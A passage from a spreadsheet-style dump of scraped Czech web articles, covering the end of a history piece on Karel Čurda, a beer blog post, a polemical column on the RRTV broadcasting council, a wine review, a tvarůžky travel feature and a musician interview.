poslední době Čurdovo autorství dopisu zpochybňuje. Tvrdí, že informace v dopise byly jednak poměrně nekonkrétní, jednak byl údajně psán „osobou těžce ovládající péro“, což Čurda pravděpodobně nebyl, a jednak jeho obsah nedokázal Čurda při poválečném vyšetřování reprodukovat ani přibližně. Ani adresování dopisu četnické stanici zrovna v Benešově v sobě nemá příliš logiky. Neověřitelné podezření z autorství dopisu padá spíše na Čurdovu matku, nebo někoho jiného z příbuzných. Každopádně o tři dny později, 16. června 1942, překročil nervově zhroucený Čurda práh budovy řídící úřadovny gestapa v pražské Bredovské ulici s tím, že může podat informace o aktovce, kterou viděl vystavenou ve výloze obchodního domu Baťa. Nevěděl sice, kde se skrývají atentátníci, ale znal jejich jména a podal zevrubnou výpověď o konspiračních bytech a všech spolupracovnících z odboje, se kterými přišel do styku. Vzápětí začalo zatýkání a odhalení parašutistů v kostele sv. Cyrila a Metoděje bylo už jen otázkou času. Většina lidí, zatčených na Čurdův popud, byla popravena i s rodinami. Po snad lidsky pochopitelném selhání, jakkoli s tragickými následky pro stovky lidí, přišla další fáze Čurdova života. Čurda poté přestal být jen spolupracujícím pachatelem. Gestapo ho přestalo bít, přestalo mu dávat pouta a z Čurdy se stal vědomý spolupracovník a volavka, nasazovaná proti odbojovým organizacím. Začal dělat něco, co už dělat nemusel, ani pod jakoukoli pohrůžkou. Ale touha po penězích a životním standardu, strach z jeho „přátel“ z gestapa, stejně jako rezignace na osud, který se mu vymkl z rukou, vedly k jeho novým aktivitám. Prostě už neřekl ne a na svědomí tak má další desítky, ne-li stovky lidí. Ale svědomí hrálo svou roli a Čurda se začal utápět v alkoholu . Čurda se během války stal otcem nemanželského dítěte, počatého ze vztahu s Karolínou Jirákovou jen několik dní před jeho odchodem do exilu. Po návratu do protektorátu a propuštění na svobodu po jeho zradě se ke své známosti vrátil, ale brzy se zamiloval do švagrové člena gestapa Roberta Ereta, Marie Späckerové. Ta se kvůli Čurdovi rozvedla a v únoru 1944 se vzali. Záhy se jim narodil syn Karel . Čurda si během svého nového života agenta gestapa změnil jméno na Karel Jerhot a nehledě na nové manželství a narozené dítě se díky své situaci často uchyloval k alkoholu . Čurda nebyl jen tak lecjakým agentem, jako jeden z nemnoha byl veden jako agent-důvěrník a jako takový měl přidělenou i zbraň. Od gestapa dostal, kromě v bance vázané a postupně vyplácené odměny pěti miliónů korun, i dvoupokojový byt na pražské Francouzské (tehdy Bismarckově) ulici č. 8. Peníze vybíral vždy v doprovodu příslušníka gestapa Heinze Diaba, který si ale většinu z vybrané částky ponechával sám. Do jara 1945 si tak Čurda vyzvedl 1 335 000 K. Zbytek vkladu, skoro čtyři miliony korun, vybral 7. dubna 1945 a odvezl je do domu matky svého švagra do Manětína . Tam bankovky jeho manželka údajně na konci války spálila. Možná je i verze, že se peněz nakonec zmocnil bratr jeho manželky, gestapák Eret. Čurda byl v Manětíně zatčen hned 5. května 1945 a po krátkých peripetiích se octl ve vazbě MLS. Ke svému vyšetřování i následnému procesu se stavěl rezignovaně. 29. dubna 1947, tedy jen několik dní před koncem retribuce, byl MLS v Praze odsouzen k smrti a popraven oběšením v pankrácké věznici. Podat žádost o milost odmítl, jeho žena se synem byli odsunuti do Rakouska . Mnoho lidí v jeho rodišti na něj ovšem nedá dodnes dopustit. Pro ně je totiž zachráncem, který Starou Hlínu uchránil od osudu Lidic . Zdroje: ČERNOHORSKÁ, Helena: Rudolf Hrubec . Bylo nebylo, Praha 2024 KMOCH, Pavel: Operace Anthropoid: Epilog. Academia , Praha 2018 PLACHÝ , Jiří: Karel Čurda aneb Osudné selhání československé zpravodajské služby? Historie a vojenství 4/2013 STEGUROVÁ, Karolína: „Rozhodovali se jinak…“ Chování československých parašutistů zatčených na území protektorátu 1941-1943. Diplomová práce, ÚČD FF UK 2012 https://zpravy.aktualne.cz/domaci/proc-zradil-karel-curda-historik-predlozil-nova-fakta/r~2d44572c5daf11e39c89002590604f2e/</t>
  </si>
  <si>
    <t>20241201_128_3476773885_8aa2649c716c1d9ff434.html</t>
  </si>
  <si>
    <t>8aa2649c716c1d9ff434</t>
  </si>
  <si>
    <t>Radler pro mne není</t>
  </si>
  <si>
    <t>Radler pro mne není 1.12.2024 Když jsem v létě roku 1993 pozoroval v jednom švýcarském výčepu, kterak si hosté lijí do točeného piva džus, byl jsem značně konsternován. Stejně tak mne děsili Poláci, kteří si „vylepšovali“ tenkrát takřka nepitelné polské pivo sladkým ovocným sirupem. V Berlíně se do trpkého kyseláče Weiss také přidává červená či zelená šťáva. Na tuto rozmařilou zhovadilost reagují mnohé pivovary, které vychází vstříc výrobou tzv. „Radleru“. Je to vlastně nízkoalkoholické pivo už při procesu vaření smíchané s ovocnou šťávou. Ta však povětšinou nepochází z čerstvého ovoce, nýbrž se jedná o různé koncentráty. Dalším stupněm ovocného „ piva “ jsou bezalkoholové birrely Zejména ve vlámské (belgické) pivní kultuře se vyskytují tradičně ovocná piva , které už mají mezinárodní věhlas. Jedná se zejména o typy třešňové či višňové (Kriek) a malinové (Frambois). Další ovocnou odnoží jsou z anglosaského pivního světa přicházející Cidery a Perry. Toto jsou však legálně zkvašené ovocné šťávy a já osobně je příliš za piva nepovažuji. Někdy se však vkusný ovocňák vydaří. Pamatuji na rýmařovskou malinu nebo štramberskou švestku. Africké verze z banány či ananasem vůbec nemusím. Nedávno jsem v hospodě ochutnal těšínského Barabu – ležák s pomerančovou příchutí. Bohužel pro mne odporně sladký dryják, který měl s pivem společnou snad jen jakousi pěnu. Proti ovoci nic nemám, ale v pivu je nikterak nevítám. 2 komentáře u “ Radler pro mne není ” Pavel Janíček ( 3.12.2024 | 9.59 ) napsal: tak třeba Silly Rouge… výborné ovocné pivko s výraznou chutí třešní a lehkou stopou třešňových pecek, vše vyvážené a chuť evokuje konzumaci čerstvého ovoce… bývalo občas u Segala Autor: Jarosek Rubrika transition_slide Aktuálně</t>
  </si>
  <si>
    <t>209</t>
  </si>
  <si>
    <t>115</t>
  </si>
  <si>
    <t>20241201_129_3476610276_12455889ed17fc2127cf.html</t>
  </si>
  <si>
    <t>12455889ed17fc2127cf</t>
  </si>
  <si>
    <t>Pavel Foltán: RRTV – jablko politických svárů? Už zase?</t>
  </si>
  <si>
    <t>Pavel Foltán: RRTV – jablko politických svárů? Už zase? A už je to tady! Mohl bych se zlomyslně a poťouchle smát, jak ta moje (v branži už obecně a insiderům skoro až symbolicky známá) křišťálová koule zase zafungovala – když jsem už od začátku nové „aféry RRTV “ říkal, že tohle není „jen tak kulička“, jak pravil ten „italský“ alchymista Honza Skoták z Hrdlořez k „císařovi“ Matěji Kotrbovi – ergo pekaři – v té filmové „pohádce“, kde se o tu kuličku rvala ta tehdejší politická j-elita oné rudolfínské doby. A podobnost čistě nenáhodná i zde opět jasně dokazuje, že ten tzv. čas „an sich“ neexistuje, podobně, či stejně, jako tu neexistuje ani ta tzv. „náhoda“. Čili hned (jak ta „kauza Rada“ vyjukla na světlo mediálně-politické) jsem říkal, že i v tomhle případě je něco jinak. Respektive, že všechno je jinak. Tož tak. Ale teď už vážně a věcně. Od počátku téhle „nové RRTV aféry“ (tj. už od 21.11.2024, kdy ta RRTV zveřejnila tu svou podivnou a přinejmenším i dubiózní tiskovou zprávu) jsem říkal, že právě tahle akce není právě ta příslovečná „jen tak kulička“, ale že je to taková ta telenovela politických hrátek s čertem, a že asi bude stejně dlouhá, i stejně nepovedená, jako ty ostatní různé a jiné televizní telenovely. A helemese, uběhlo jen pár dní, a už tu máme (z henté oné politické estrády) tzv. pilotní díl. A je povedený? Inu, leckdo leckde by logicky mohl říct, že v téhle hře bude těch polit-kohoutů na tom polit-smetišti asi víc. Takže pro některé z nich by se tenhle začátek mohl zdát jako že relativně povedený. Nicméně, ještě časem uvidíme, jak se to celé bude dál vyvíjet. A už v pátek ráno vyrazil první pilot. Řečeno s hláškou z filmu: „Před hájovnou stojí zaražený pilot.“ A kdo ví, jestli to není právě on. Neboť právě s tímhle pilotem „sem k nám“ do toho „našeho“ mediálního prostoru dopadla rachejtle pod titulkem: „ RRTV nepotřebujeme. Senátoři budou po fiasku s influencery řešit smysl vysílací rady“. Ten výstřel té rachejtle propaguje hlavně senátorku Kordovou Marvanovou, no a senátora Smoljaka… (Inu, jak jinak? Řeknou si insideři, a s nimi rovněž informovanější laici). Tak tohle (i bez té mé příslovečné „křišťálové koule“) mohli předpokládat už pár dní předem, ještě než vypukla ta „aféra Rada“, tedy už před sedmi až čtrnácti dny, kdy se „zčistajasna“ jakoby pro někoho možná poněkud překvapivě na pavlačích bulvárních bulvárů začali producírovat zombíci prastarých mediálních afér, zejména spjatí velmi negativně se ZRADOU republiky a jejích daňových poplatníků v souvislosti s arbitráží CME vs. ČR (tzv. o TV Nova ), i s další následnou arbitráží tzv. o TV Prima – tehdy suma sumárum o nějakých 11 + 4 = 15 miliard korun českých. Dost hustá zrada. Ale v tuzemácku od hentoho „sametu“ 1989 už vesměs jakoby standardní. Avšak tyhlety „hrdiny“ (zatím ještě) ponechme stranou. Bulvární medializace těch jejich výplodů v této době (a právě v této době – sic!) svědčí o ledasčems, a ledacos prokazuje. A o tom to je. A o tom to ještě bude (asi už brzy). A svou roli v tom tehdy sehrála právě i ta dnešní senátorka Marvanová (tehdy poslankyně za ty malé strany té velké Pravdy a Lásky &amp;amp; spojených + spojeneckých kaváren). Ale o tom případně také až později. Nicméně zpět k tomu „pilotu“ oné mediální telenovely, kde (zdá se) hlavní roli zatím hraje ta senátorka Marvanová, které přihrává senátor Smoljak a spol. Podle mediální citace Marvanová (na adresu RRTV ) údajně řekla: „Jsem přesvědčena, že takovýto orgán, politicky obsazovaný, velmi drahý a rozhodně ne nestranný, nepotřebujeme.“ Marvanová toho řekla víc, ale není tu „čas“ ani prostor zabývat se tím, co by měla vědět absolventka práv / advokátka / celoživotní kariérní funkcionářka – poslankyně a nyní senátorka. Měla by to vědět, a osobně nepochybuji o tom, že to zcela určitě také ví. Ale … Že to neví její support = senátor Smoljak – to asi nepřekvapí – nemá právní vzdělání, praxi, zkušenost … ostatně i v té „špičkové“ politice je něco jako konstantní „elév“. Ale to není naše chyba. A řečeno s Karlem Krylem „to není naše pivo “ rozlitý. Už jen z toho mála, co je shora zmíněno, by si kdokoliv kdekoliv logicky mohl říct, že už i těm řídícím strukturám toho senátního „předvoje“ Marvanová / Smoljak musí být jasno, že za rok už tahle 5-1 koalice &amp;amp; a spol. struktury už nebudou mít vliv ani na ovládání, ale ani na obsazení mediálních rad, ani na event. odvolání jejích členů, a podobně. A za další rok a násl. už na to nebude mít vliv ani ta jejich dosavadní část senátorů. No a tak teď o překot (a leckdo by si mohl říct, že hystericky a podobně) se snaží to zvrátit. Například tím, že se nějak – či jakkoliv – pokusí ty rady odvolat, a do těch nových nasadit „svoje“ lidi. A když by to nešlo, tak se pokusí ty rady zrušit = ve stylu „když ne my, tak nikdo“. Je to „řešení“ velmi „demokratické, velmi konstruktivní, velmi korektní, velmi občanské, velmi právně čisté, velmi systémové“, apod. Tož tak. Přesně ve stylu těch struktur toho druhu a toho typu (je to už historicky ověřeno za těch uplynulých 35 let – a je to za tu dobu rovněž historicky prokázáno a doloženo). Inu, jak už je tady historicky 35 let známo – je to ta jejich Pravda &amp;amp; Láska s ručením žádným, a zcela bez jakékoliv odpovědnosti – nota bene vůči lidu, národu, a vlasti. No, a ta dnešní senátorka Marvanová právě teď na tuhle RRTV křičí, že cit.: „Jsem přesvědčena, že takovýto orgán, politicky obsazovaný, velmi drahý a rozhodně ne nestranný, nepotřebujeme.“ Jenže pak by kdokoliv kdekoliv mohl začít vzpomínat, a senátorce Marvanové připomenout období, kdy jí coby tehdy poslankyni právě tohle nevadilo, a právě na tom, co teď kritizuje, se tehdy sama osobně podílela. A nejen právě na tom. Bylo by toho „v rukávu“ mnohem víc. Plné ruce trumfů a žolíků. (Sic!) A leckdo leckde by důvodně mohl zapochybovat jak o všeobecné, tak i o mediálně právní a jiné odbornosti dlouholeté ex-poslankyně a nynější senátorky Marvanové, i na základě jejích licitací o tom, proč „původně rada vznikla“ atd. atd. atd. No a kdokoli kdekoli by pak na adresu těchto jejích tezí mohl podotknout, že i to už je tzv. hodně „přes čáru“. Ale kdo ví, možná, že se toho (nejenom na ni) časem „nahledá“ ještě víc. Pro občana, voliče a daňového poplatníka (včetně plátců R-TV poplatků), vč. všech uživatelů internetu a tzv. „sociálních“ sítí, z řad laiků, a nota bene pak i z řad více či méně poučených „amatérů“ (rozuměj milovníků), a nota bene pak z řad odborníků, či dokonce insiderů, je pak podobně alarmující rovněž ta „stárdens šou“ poslance ODS , jejího místopředsedy, a ministra kultury Baxy … Ty jeho kreace politických tanečků na téma RRTV už jsem letmo popsal v předchozím článku, přičemž dnes bych musel být mnohem přísnější i vzhledem k tomu, jak si to Baxa jen za těch pár dní v té kauze dokázal zkomplikovat. (Uvidíme, jestli senátorka Marvanová navrhne odvolat i Baxu z funkce ministra, a co na to pak i senátor Smoljak, coby mediálně právní „expert“.) Jestliže tedy – podle různých těch mediálních titulků – senátoři v čele s Marvanovou, Smoljakem a spol. chtějí „řešit smysl vysílací rady“ resp. „smysluplnost její existence“ a to vše „probrat i reálně“ (was heisst reálně? paní senátorko) – pak by se jim taky možná mohlo stát, že by logicky museli dojít k tomu, že buď toho rychle nechají, a nebo (symbolicky vzato) „odvolají“ zároveň i sami sebe = složí své mandáty v tomhle Senátu, a ve stylu „když ne MY, tak NIKDO“ navrhnou zrušit Senát jako celek. Občan bude jásat. (Většina občanů nepochybně.) Ale na tohle Marvanová, Smoljak, a spol. asi nemají „koule“. Asi? Určitě a zcela nepochybně na to ty „koule“ nemají. A mít ani nebudou. Nikdy. Takže lid i tohle bude muset udělat za ně. Škoda, mohlo je to míň bolet. A mohlo to být lacinější. Lid, národ, občané, voliči a daňoví poplatníci mohli na neexistenci tohoto Senátu ušetřit mnohem víc, než na nějaké RRTV – stačí si srovnat roční rozpočet Senátu a roční rozpočet RRTV (v letech 2009 až 2015 jsem pracoval ve funkci místopředsedy RRTV a tak velmi dobře vím, že tehdy byl roční rozpočet té RRTV zhruba kolem 50 až 55 miliónů korun – a dneska po těch zhruba 10 letech je údajně kolem 80 mil. korun – srovnejte si to s ročním rozpočtem Senátu – a uvidíte sami). Ostatně – podle toho, co se z oblasti vox populi už dlouhá léta ozývá, tak – cit. „vzhledem k tomu, co tenhle Senát dělá, je předražený i zadarmo“ – konec citace. Tento článek je uzamčen Po kliknutí na tlačítko "odemknout" Vám zobrazíme odpovídající možnosti pro odemčení a případnému sdílení článku. Přidejte si PL do svých oblíbených zdrojů na Google Zprávy . Děkujeme. Foto: archiv Popisek: Pavel Foltán Rubrika transition_slide Názory a petice</t>
  </si>
  <si>
    <t>201430</t>
  </si>
  <si>
    <t>20241201_13_4248997249_388f9294ff84108fff9c.html</t>
  </si>
  <si>
    <t>388f9294ff84108fff9c</t>
  </si>
  <si>
    <t>Víno Rulandské šedé 2022, moravské zemské víno, Vinařství Vaďura</t>
  </si>
  <si>
    <t>Víno Rulandské šedé 2022, moravské zemské víno , Vinařství Vaďura Zobrazit rozložení bodů 'stobodovky' 1. 2. 2025 Obrovsky přezrálý materiál. Su mile překvapený, že primáry stále držijů a nestihly úplně vyfunět už v hroznech. Pozůstatkem Rýňáku sů broskve a meruňky posunuté do jejich marmeládové, rozvarové a jinak tranformované tváře. Nos je dál rozvinutý o terroirní žarošický štych a mineralitu. Při nižší teplotě je hodně znatelných 9,5 g/l kyseliny a pomalu, jak se mně flaška ohřívá, tož sa to zapracovává, ale ukazuje sa zasej alkohol v chuti. Není to nic co by vyloženě zavazalo, ale stojí to za zmínku, protože je to v synergii s mineralitů. V chuti volty a kyseliny spolkly skoro veškerý zbytkový cukr. Aromatika chutě kopíruje nos plus ukazuje z přezrálej spadlej, meruňky pecku a meruňkový kompot. Je to přeobrovské, šťavnaté, velké víno . Dochuť je nekonečná a brutálně minerální. Slovácky minerální. Kulatější. Jemnější. Mně bližší... Neměl jsem v plánu tady hodnotit, ale toto víno si to zaslůží a ikdyž na první dojem može připadat overwhelming a body ze salonu vín těžijů zejména z "wow efektu", tak i přes analytický brutalizmus má v sobě svoju pitelnost. Vzorek, který si budu dlůho pamatovat. /100 10. 9. 2024 Zlatavá barva, dobrá viskozita, ve vůni slibně banánové, v chuti navazuje, jemné kyseliny, banány, středně plné, harmonické, doznívání dlouhé. /100 30. 3. 2025 Zelenkavě bledé s lehkým zlatavým náznakem. Vůně je flórální, bylinky s vystupujícím travnatým nádechem, skoro připomínající kopřivové Sauvignony. Objevuje se i nasládlost zralých až přezrálých jablek. Poměrně pevná a důrazná kyselina trošku koliduje se zvláštní až jakoby bonbónovou sladkostí, možná danou vyšším zbytkovým cukrem. Celkově ale docela slušné víno . Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20241201_130_3476573101_9785c730a1d302198546.html</t>
  </si>
  <si>
    <t>9785c730a1d302198546</t>
  </si>
  <si>
    <t>Za nejlepšími českými sýry jeďte za nosem. Toto město je sýrovým rájem!</t>
  </si>
  <si>
    <t>Za nejlepšími českými sýry jeďte za nosem. Toto město je sýrovým rájem! aromatický zrající sýr, Loštice , Olomoucké tvarůžky, syrečky, tvargle, Tvarůžkový cukrárna Tento typ sýra buď milujete, nebo nesnášíte. Je totiž tak specifický, že nic mezi tím neexistuje. Přesto má už po desetiletí tolik obdivovatelů po celém Česku, že objem výroby neustále roste. Pokud se někdy dostanete do tohoto města na Šumpersku, pak si rozhodně nenechte ujít návštěvu podniku, který možná ucítíte už z dálky. Alespoň symbolicky. Najdete tu všechno, co do takové správné cukrárny patří. Od dortíků a závinů, přes rolády, štrúdly a chlebíčky až po sušenky a oblíbené věnečky. Podnik je tak vyhlášený, že je cílem návštěv a nákupů nejen místních, ale také zájezdů turistů. Ochutnat zdejší regionální pochoutky patří totiž k silným gastronomickým zážitkům, které nikde jinde nezažijete. Ale pozor, má to háček. Není věneček jako věneček Pokud už si brousíte zuby na něco sladkého ke kávě a hodláte vyrazit, pak má tento výlet jedno malé „ale“. Tahle cukrárna totiž nenabízí klasické sladké zákusky. Je jen a jen tvarůžková. Už jste o ní slyšeli a víte, kam vyrazit za nosem? Jedinečný podnik, kde se spojují tradiční aromatické olomoucké tvarůžky s netradičním způsobem zpracování a přípravy, můžete navštívit v Lošticích na Šumpersku. V nabídce zdejší vyhlášené tvarůžkové cukrárny, která je jen pár kroků od náměstí, najdete i tvarůžkovou lokši, tvarůžkovou roládu, tvarůžkový štrúdl nebo tvarůžkový dort. V menu pak objevíte i další aromatické speciality, jako třeba bramboráček, langoš, hot dog nebo tvarůžkový tatarák. Neuvěřitelné chuťové variace Výrobky z tohoto zrajícího sýra mají tak specifickou chuť a vůni, že si pro tuto delikatesu jezdí její milovníci z celého okolí. Ochutnat tady můžete nejen tvarůžkové zákusky či tvarůžky v kombinaci s listovým těstem, ale také variace malých porcí tvarůžků, které jejich výrobci často nabízejí s různými druhy koření. Originální slanou pochoutkou k pivu nebo vínu jsou Poštulkovy tvarůžkové moučníky, kterých tady nabízejí hned 15 druhů. Jedná se nejčastěji o kombinaci listového těsta s jemnou pěnou z Olomouckých tvarůžků. Moučníky můžete ochutnat také z bramborového či piškotového těsta. Tvarůžky jsou výživově hodnotné Vyrábějí se totiž z netučného kyselého tvarohu a tak obsahují plnohodnotné bílkoviny a vápník Díky malému obsahu tuku mají zase nízkou energetickou hodnotu Zdroj Shutterstock Prodeje rok od roku rostou Zrající sýr s charakteristickým odérem je tak populární u nás i ve světě, že v domovských Lošticích dokonce v příštích letech hodlají navýšit jeho výrobní kapacity. A to až o neuvěřitelných 70 procent, takže bude potřeba do dvou až tří let vystavět dokonce další nový provoz. Stabilní vztahy s odběrateli včetně řetězců stojí za tím, že syrečky, jak se tomuto typu sýra také říká, jsou v základní řadě k dostání ve vybraných prodejnách po celém Česku, ale i na Slovensku , v Maďarsku a Polsku . Kompletní sortiment více než třiceti specialit je pak k dostání nejen v Lošticích , ale i v Ostravě , Brně a Olomouci , kde najdete celé specializované prodejny. Pro věčné dietáře i sportovce Navíc jsou tvarůžky i výživově hodnotné. Vyrábějí se totiž z netučného kyselého tvarohu, a tak obsahují plnohodnotné bílkoviny a vápník. Díky malému obsahu tuku mají zase nízkou energetickou hodnotu. Kromě Loštic se vyrábějí voňavé syrečky pod názvem tvargle také ve Velké Bystřici nedaleko Olomouce . V případě tvarůžků jde navíc o jediný původní český sýr, který díky své unikátní chuťové vyváženosti a výživovým vlastnostem získal v roce 2010 dokonce Chráněné zeměpisné označení-PGI. Tvarůžkové moučníky pak získaly také několik ocenění, například Regionální potravina Olomouckého kraje , Česká chuťovka či Top výrobek OK. Moučníky mají i certifikát Haná regionální produkt. Dědictví staré stovky let Výroba tvarůžků v Lošticích není žádná novinka, naopak. Tento typ sýru se na Olomoucku objevuje již v 16. století. V městečku mají tvarůžky dokonce i své muzeum. Za tu dobu se technologie a receptura změnila jen minimálně. Muzeum v Lošticích představuje výrobu této oblíbené pochoutky od dob domácí produkce až po tu moderní, průmyslovou. Návštěvníci si mohou nejen prohlédnout unikátní stroje, ale také si například vyzkoušet, jak bylo těžké zpracovávat nohama čerstvý tvaroh v kádi pro tvarůžkovou výrobu. Součástí expozice jsou i tvarůžkové recepty. Už jste vyzkoušeli klasiku v trojobalu? Milovníci tvarůžků je mají v oblibě v různých podobách třeba jako tatarák Oblíbené jsou ale i usmažené v klasickém trojobalu Zdroj Shutterstock „Voňavá“ adventní Olomouc I letos se můžete těšit na oblíbenou Tvarůžkovou cukrárnu v adventní Olomouci . Až do 22. prosince si totiž můžete tuto tradiční specialitu a výrobky z ní koupit přímo v centru města na Ostružnické ulici, a to vždy od čtvrtka do neděle od 10. do 18. hodin. Zdroje: regiony.rozhlas.cz, www.ok-tourism.cz, www.hanackyvecernik.cz</t>
  </si>
  <si>
    <t>2009.9999999999998</t>
  </si>
  <si>
    <t>20241201_131_3548063225_925b767580cf8ce89fd6.html</t>
  </si>
  <si>
    <t>925b767580cf8ce89fd6</t>
  </si>
  <si>
    <t>Will Eifell: Měl jsem chuť udělat trochu víc hluku</t>
  </si>
  <si>
    <t>Will Eifell: Měl jsem chuť udělat trochu víc hluku Foto: Tomáš Lumpe Ústecký písničkář Jiří Poživil alias Will Eifell se na hudební scéně v různých projektech pohybuje už přes deset let. Původně sólový hudebník se odhodlal vrhnout se do nového projektu a vznikla regulérní čtyřčlenná kapela. Nyní vydala desku s názvem Některý věci se dějou dvakrát, chystá videoklip a koncert v Hraničáři. Odkdy se věnujete hudbě? Samorostsky od dětství, zuškově od třinácti let, koncertně od osmnácti. Máte nějaký hudební vzor? Spoustu! Mám takovej seznam svých hrdinů, ze kterých se snažím si po svém nějak čerpat. A jsou to osoby od Boba Dylana , přes Filipa Topola kolem Johna Fruscianteho po Patti Smith . Jste Ústečan. Jak se podle vás v Ústí žije? Mně se tu žilo vždycky dobře. Vyrostl jsem v Neštěmicích v takový klidnější části s rodinejma domkama, rok jsem bydlel v garsonce na Klíši, a teď několik let bydlím v centru. Vnímám sice, asi jako každej, spoustu lokálních nešvarů, ale pozitiva toho Ústí, jak ho vidím já, rozhodně převažují Tak co máte v Ústí rád? Miluju takový to často propíraný betonový genius loci, dále například Benešák, Churchillku, “park u ježka”, letní kino, městský sady, náplavku, zdymadla, výhled z Mariánský skály na auta, co z tý výšky vypadají jako angličáci, pak taky takový to místo s lavičkama za hlavním nádražím, různý architektonický skvosty, Hraničář, Činoherák, knihovnu, Vysmátou Žábu, Café Max, Královku, je toho spoustu! Taky jsem tu potkal spoustu skvělejch lidí a řadu přátel. A naopak nerad? Nemám rád každoroční tradiční nadávání na půlmaraton v centru města a jakousi odevzdanou zatrpklost lidí, co tu bydlí, a která se třeba ve velkém projevuje v některých komunitních facebookových skupinách. A nemám rád řeči o tom, že je Ústí nekulturní, mrtvý město bez potenciálu. Osobně to vidím přesně naopak. Ale to celé by asi bylo na delší povídání… Co všechno pro vás muzika znamená? Hodně věcí. Miluju ji jako posluchač i jako hudebník. Ale není to pro mě jenom o muzice, ale spíš o tvoření celkově. A moc mě baví celej ten svět toho potkávání se s různými, často trošku podivnými lidmi, a ty historky a momenty, který to přináší. Nedávno ještě hudebník a písničkář Will Eifell, ale v současnosti už hrajete se stejnojmennou kapelou. Představíte nám spoluhráče? Na kytaru se mnou hraje Honza Bouma, který taky zpívá vokály, o baskytaru se stará Martin Zeman a za bicími sedí Honza Šimánek. Intenzivněji spolu zkoušíme od loňského podzimu, ale velice rychle si to sedlo a začalo nás to spolu bavit. Až to vykulminovalo v to, že jsme v létě nahráli v téhle sestavě desku Některý věci se dějou dvakrát, která vyšla v říjnu. Proč ta změna? A je rozdíl hrát sám jako písničkář a s kapelou? Měl jsem chuť udělat trochu víc hluku. Rozdíl to je velký, sportovní tematikou je to trošku jako slalom a sjezd, oboje se jede na lyžích, ale technika je jiná, jízda je jiná a výsledek je taky jiný. Ale obojí je super! Jak jste se dali dohromady? S Honzou Boumou se známe už několik let díky jeho bývalé kapele IDIO&amp;amp;IDIO. Poslední roky jsem ho občas zval koncerty, aby si se mnou zahostoval, až jsme spolu začali hrát pravidelně. Honza Šimánek je kolega bubeníka, který s námi chvilku hrál, a s Martinem jsme se potkali v kapele La Banda de Contenedor, kde k jejímu konci občas zaskakoval. Která vaše píseň je, dá se říct, zlomová? Teď je určitě zlomových těch pět songů z novýho EP, se kterými začíná úplně nová kapitola. A jde říct, kterou písničku hrajete nejraději? Víc než o jednotlivých písničkách je to spíš o pocitu, kdy se stane “to něco”, kvůli čemu to stojí za to dělat. Máte k nějaké písničce natočený i klip nebo to plánujete? Videoklip právě připravujeme. Měli bychom točit v zimě. Samozřejmě na písničku z nový desky. Měli jsme k tomu před pár týdny první schůzku a vypadá to velice nadějně. Měli by to točit Ideamakers, kteří v minulosti udělali řadu zajímavých klipů, například Houpacím Koním, kapele OWL nebo trailery pro Činoherní studio. A natáčení vypadá, že bude velká výzva. Takže ideální výchozí bod! Působíte v Ústí. Nebylo by jednodušší dělat muziku třeba v Praze ? Těžko říct. Aktuálně tam znám ve svý generaci pár hodně zajímavých tvůrčích lidí dělající podobnou muziku, se kterými by mě bavilo chodit na pivo , ale v Ústí chci být kvůli svým aktivitám a protože to tu mám rád. A ono dělat muziku je nakonec těžký i lehký všude stejně. Řadu let jste organizoval akci Útulek Fest. Co vás vedlo s tím skončit a bude tento festival pokračovat dál? Festival rozhodně pokračuje dál v rukách zakladatele a napříč historií hlavního organizátora Emilia Dvořáka . U sebe už jsem čistě po 11 letech, co jsem se na festivalu podílel, cítil potřebu posunout se dál a věnovat energii do jiných věcí. A na čem v současné době pracujete? Já osobně se redakčně podílím na kulturním rozhledníku Uličník. Dále spravuji platformu Scéna Aussig , kde už tři roky píšu o ústecké kultuře. V loni jsme například ve spolupráci s KSUL udělali soutěž mladých hudebních talentů. Podařilo se nám také udělat čistě ústeckou stage na letošním pražském festivalu Žižkovská noc. Od března ve spolupráci s knihovnou točím podcast Kuk na scénu, kde představuji regionální osobnosti z oblasti kultury. V knihovně jsem ještě do srpna pracoval na plný úvazek, nyní jsem ho snížil a přesunul se do Činoherního studia. A s kapelou se teď se především snažíme dostat k lidem nový věci. Měli jsme ze začátku podzimu menší pauzu kvůli různým osobním věcem, takže teď začínáme opět zkoušet a brzy začneme chystat lednový křest desky. Taky se chceme zabydlet v nové zkušebně, do které nás pozvali kamarádi z kapely Hvězda moří. Kde vás mohou fanoušci vidět? Na pátek 24. ledna chystáme koncert ve Veřejném sále Hraničář. Rádi bychom tam kromě Některý věci se dějou dvakrát pokřtili i videoklip. Jako hosta budeme mít pražskou písničkářku Kvietah. Už vymýšlíme, jak to celé pojmout, aby ten večer byl zážitek nejen pro nás, ale i pro diváky. Co rád děláte ve volném čase? Většinu mého volného času spolkne tvoření nebo mé jiné aktivity, ale ty mě baví tak, že se ty hranice mezi “trávím volný čas” a “na něčem pracuji” smývají. Občas si čtu, v poslední době hlavně poezii, koukám na filmy, seriály a fotbal a pro změnu chodím za kulturou. Prozradíte nějaké plány do budoucna? Byl bych rád, kdyby se nám s kapelou podařilo odrazit se k většímu počtu koncertů. Rádi bychom příští léto objeli nějaké zajímavé festivaly. Taky věřím, že brzy začneme dělat i na novém materiálu, který už v náznacích začíná viset někde ve vzduchu. Váš e-mail nebude zobrazen veřejně. Komentář Δ Nejnovější příspěvky Alex Borská: Byl to dlouhý boj plný nejistot a zvratů Žáci střední školy AGC uspěli v Bobříku informatiky a robotické soutěži na ČVUT Fyzioterapeut z ACME: Ke každému přistupujeme individuálně Ochutnejte adventní pivní speciál a oslavte silvestra Na Rychtě Zaměstnavatelé doporučují uchazečům Střední průmyslovou školu, Resslova 5 Nejnovější komentáře Sbírka Krabice od bot: Třetina dárků ještě vyhlíží svého dárce Pozvánka na výstavu v Památníku Terezín Zrušení poboček Úřadu práce v regionu rozhodně odmítáme, řekl hejtman Brabec Café Nobel v Děčíně : Archeologie hornictví v Krušných horách Pozvánka na Tříkrálový koncert v Mostě Spravovat Souhlas Používáme soubory cookies k personalizaci obsahu a reklam, poskytování funkcí sociálních médií a analýze návštěvnosti. Váš souhlas nám umožní zpracovávat údaje, nesouhlas může nepříznivě ovlivnit technické vlastnosti webu. Funkční Vždy aktivní Technické uložení nebo přístup je nezbytně nutný pro legitimní účel umožnění použití konkrétní služby, kterou si odběratel nebo uživatel výslovně vyžádal, nebo pouze za účelem provedení přenosu sdělení prostřednictvím sítě elektronických komunikací. Předvolby Technické uložení nebo přístup je nezbytný pro legitimní účel ukládání preferencí, které nejsou požadovány odběratelem nebo uživatelem. Statistiky Technické uložení nebo přístup, který se používá výhradně pro statistické účely. Technické uložení nebo přístup, který se používá výhradně pro anonymní statistické účely. Bez 